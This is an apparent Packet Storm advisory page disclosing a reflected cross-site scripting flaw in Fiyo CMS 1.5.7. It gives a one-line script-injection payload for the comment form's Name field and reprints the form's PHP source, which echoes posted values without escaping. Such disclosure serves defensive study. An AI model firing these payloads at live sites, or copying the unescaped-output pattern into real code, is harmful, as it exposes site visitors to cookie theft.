exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Fiyo CMS 1.5.7 Cross Site Scripting

Fiyo CMS 1.5.7 Cross Site Scripting
Posted May 30, 2014
Authored by Mustafa ALTINKAYNAK

Fiyo CMS version 1.5.7 suffers from a cross site scripting vulnerability.

tags | exploit, xss
SHA-256 | 08fed02f9f2b63e9e1312b61486223ac28bb6b6a3ced74fc74a2776b5d4d06ab

Fiyo CMS 1.5.7 Cross Site Scripting

Change Mirror Download
# Exploit Title: Fiyo CMS 1.5.7 XSS Vulnerability
# Date: 05/29/2014
# Author: Mustafa ALTINKAYNAK
# Download URL :http://www.fiyo.org/
# Software Link: http://www.fiyo.org/download
# Vuln Category: CWE-79 (XSS)
# Tested on: Fiyo CMS 1.5.7
# Tested Local Platform : XAMP on Windows
# Patch/ Fix: Not published.
---------------------------

Technical Details
---------------------------
Reflected XSS : Review form can be bypassed. Users can be played cookies.

Example :
Nama : "><script>alert("test");</script>

---------------------------------------------------------------------------------

Form Comment (XSS Vuln)

# /apps/app_comment/form_comment.php

<?php
/**
* @name Comment
* @version 1.5.0
* @package Fiyo CMS
* @copyright Copyright (C) 2012 Fiyo CMS.
* @license GNU/GPL, see LICENSE.txt
* @description
**/

defined('_FINDEX_') or die('Access Denied');

?>
<script>

function reloadCaptcha() {
document.getElementById('captcha').src = document.getElementById('captcha').src+ '?' +new Date();
}
</script>

<h3 id="comments" ><?php echo comment_Leave_Comment; ?></h3>
<?php echo @$notice; ?>
<form method="post" action="#comments" class="form-comment">
<div><label><span><?php echo comment_Name; ?> *</span><div>
<input type='text' name='name' style='width:60%; max-width : 200px;' value ="<?php echo @$name; ?>" <?php if(!empty($name)) echo "readonly"; ?> class="input required" placeholder="Name" required></label></div>
</div>
<div><label><span><?php echo comment_Email; ?> *</span><div>
<input class="input required email" style='width:60%; max-width : 200px;' type='email' name='email' value ="<?php echo @$email; ?>" <?php if(!empty($email)) echo "readonly"; ?> placeholder="name@email.com" required></label></div>
</div>
<div><label><span><?php echo comment_Website; ?> </span><div>
<input type="url" class="input" style="width:60%; max-width : 200px;" name="web" value="<?php echo @$_POST['web']; ?>" placeholder="http://" /></label></div>
</div>
<div><label><span><?php echo comment_Comment; ?> *</span><div>
<textarea class="input required" name='com' style='width:100%; max-width : 500px;' rows="8" required><?php echo @$_POST['com']; ?></textarea></label></div>
</div>
<?php if(empty($privatekey) or empty($publickey )) : ?>
<div><span><?php echo comment_Security_Code; ?> * </span> <div><img src="<?php echo FUrl; ?>/plugins/plg_mathcaptcha/image.php" alt="Click to reload image" title="Click to reload image" id="captcha" onclick="javascript:reloadCaptcha()" class="captcha-image" /></div><input type="text" name="secure" placeholder="What's the result?" onclick="this.value=''" class="input required numeric" required /></div>
<?php else : ?>
<div>
<span>ReCaptcha *</span>
<div>
<script type="text/javascript">
var RecaptchaOptions = {
theme : 'clean'
};
</script>
<?php echo recaptcha_get_html($publickey);?>
</div>
</div>
<?php endif; ?>
<div style="overflow: visible;">
<input type='submit' name='send-comment' class='comment-button button btn' value="Send">
</div>
</form>

-----------

Mustafa ALTINKAYNAK
twitter : @m_altinkaynak <http://twitter.com/m_altinkaynak>
www.mustafaaltinkaynak.com
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    60 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    44 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close